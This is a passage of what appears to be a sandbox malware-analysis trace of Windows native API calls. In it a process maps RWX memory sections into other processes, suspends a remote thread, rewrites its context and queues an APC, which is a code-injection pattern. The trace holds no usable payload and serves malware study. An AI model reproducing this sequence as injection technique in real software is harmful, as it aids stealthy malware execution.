BaseAddress=0xddc58*=0x0, ZeroBits=0x0, RegionSize=0xddc5c*=0x1f4400, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0xddc58*=0x1030000, RegionSize=0xddc5c*=0x1f5000) returned 0x0 [0115.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xddc44*=0x0, ZeroBits=0x0, RegionSize=0xddc48*=0x1f4400, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0xddc44*=0x73a0000, RegionSize=0xddc48*=0x1f5000) returned 0x0 [0115.514] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="TEMP", Value=0xddc48 | out: Value="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 0x0 [0115.520] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0xddc10 | out: Value="C:\\Program Files (x86)") returned 0x0 [0115.535] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x12f289, lpParameter=0xdf2e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0115.535] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1000) returned 0x58c868 [0115.539] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x748, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x19c) returned 0x0 [0115.539] NtQueryInformationProcess (in: ProcessHandle=0x19c, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0115.539] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x19c, BaseAddress=0xdea5c*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xdea58*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xdea5c*=0x100f0000, SectionOffset=0x0, ViewSize=0xdea58*=0x9c4000) returned 0x0 [0115.541] NtClose (Handle=0x19c) returned 0x0 [0115.544] NtDelayExecution (Alertable=0, Interval=0xde6b8*=-50000000) returned 0x0 [0120.594] NtOpenProcess (in: ProcessHandle=0xde668, DesiredAccess=0x438, ObjectAttributes=0xddc18*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xddc58*(UniqueProcess=0x748, UniqueThread=0x0) | out: ProcessHandle=0xde668*=0x1a0) returned 0x0 [0120.601] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x0, ProcessInformation=0xddc68, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xddc68, ReturnLength=0x0) returned 0x0 [0120.609] NtOpenThread (in: ThreadHandle=0xddc10, DesiredAccess=0x1a, ObjectAttributes=0xddc18, ClientId=0xddc48*(UniqueProcess=0x0, UniqueThread=0x74c) | out: ThreadHandle=0xddc10*=0x1a4) returned 0x0 [0120.614] NtSuspendThread (in: ThreadHandle=0x1a4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0120.622] NtGetContextThread (in: ThreadHandle=0x1a4, Context=0xde160 | out: Context=0xde160*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x1, [65]=0x1, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x4, [73]=0x84, [74]=0xd6, [75]=0x84, [76]=0xf8, [77]=0x7f, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x554310, SegEs=0x0, SegDs=0xcfa98, Edi=0x0, Esi=0xcfb10, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0xffffffff, Ebp=0x0, Eip=0xcf6b8, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x46, [5]=0x2, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0xe8, [21]=0xa7, [22]=0xcb, [23]=0x82, [24]=0xf8, [25]=0x7f, [26]=0x0, [27]=0x0, [28]=0xe0, [29]=0x19, [30]=0x55, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0xa0, [37]=0xda, [38]=0x61, [39]=0x82, [40]=0xf8, [41]=0x7f, [42]=0x0, [43]=0x0, [44]=0x34, [45]=0x20, [46]=0xf, [47]=0x82, [48]=0xf8, [49]=0x7f, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0120.638] NtCreateSection (in: SectionHandle=0xddbf0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xddb90, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xddbf0*=0x1a8) returned 0x0 [0120.642] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a0, BaseAddress=0xddbf8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xddb98*=0x172f56, InheritDisposition=0x7ff800000001, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xddbf8*=0x9ff0000, SectionOffset=0x0, ViewSize=0xddb98*=0x173000) returned 0x0 [0120.652] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffffffffffff, BaseAddress=0xddbe8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xddb98*=0x173000, InheritDisposition=0x7ff800000001, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xddbe8*=0x75d0000, SectionOffset=0x0, ViewSize=0xddb98*=0x173000) returned 0x0 [0120.712] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x75d0000) returned 0x0 [0120.766] NtClose (Handle=0x1a8) returned 0x0 [0120.771] NtSetContextThread (ThreadHandle=0x1a4, Context=0xde160*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x1, [65]=0x1, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x4, [73]=0x84, [74]=0xd6, [75]=0x84, [76]=0xf8, [77]=0x7f, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x554310, SegEs=0x0, SegDs=0xcfa98, Edi=0x0, Esi=0xcfb10, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0xffffffff, Ebp=0x0, Eip=0xcf6b8, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x46, [5]=0x2, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0xe8, [21]=0xa7, [22]=0xcb, [23]=0x82, [24]=0xf8, [25]=0x7f, [26]=0x0, [27]=0x0, [28]=0xe0, [29]=0x19, [30]=0x55, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0xa0, [37]=0xda, [38]=0x61, [39]=0x82, [40]=0xf8, [41]=0x7f, [42]=0x0, [43]=0x0, [44]=0xb5, [45]=0xdd, [46]=0xd, [47]=0xa, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0120.771] NtQueueApcThread (ThreadHandle=0x1a4, ApcRoutine=0xa0dddc2, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0120.776] NtResumeThread (in: ThreadHandle=0x1a4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0120.776] NtClose (Handle=0x1a0) returned 0x0 [0120.776] NtClose (Handle=0x1a4) returned 0x0 [0120.782] PostThreadMessageW (idThread=0x748, Msg=0x111, wParam=0x0, lParam=0x0) returned 0 [0120.804] PostThreadMessageW (idThread=0x748, Msg=0x8003, wParam=0xde6d2, lParam=0x0) returned 0 [0120.814] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x7e4, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a4) returned 0x0 [0120.814] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0120.814] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a4, BaseAddress=0xdea5c*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xdea58*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xdea5c*=0x6350000, SectionOffset=0x0, ViewSize=0xdea58*=0x9c4000) returned 0x0 [0121.040] NtClose (Handle=0x1a4) returned 0x0 [0121.040] NtDelayExecution (Alertable=0, Interval=0xde6b8*=-50000000) returned 0x0 [0126.090] NtOpenProcess (in: ProcessHandle=0xde668, DesiredAccess=0x438, ObjectAttributes=0xddc18*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xddc58*(UniqueProcess=0x7e4, UniqueThread=0x0) | out: ProcessHandle=0xde668*=0x1a4) returned 0x0 [0126.095] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x0, ProcessInformation=0xddc68, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xddc68, ReturnLength=0x0) returned 0x0 [0126.105] NtOpenThread (in: ThreadHandle=0xddc10, DesiredAccess=0x1a, ObjectAttributes=0xddc18, ClientId=0xddc48*(UniqueProcess=0x0, UniqueThread=0x5a0) | out: ThreadHandle=0xddc10*=0x1a0) returned 0x0 [0126.178] NtSuspendThread (in: ThreadHandle=0x1a0, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0126.190] NtGetContextThread (in: ThreadHandle=0x1a0, Context=0xde160 | out: Context=0xde160*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0xc0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, 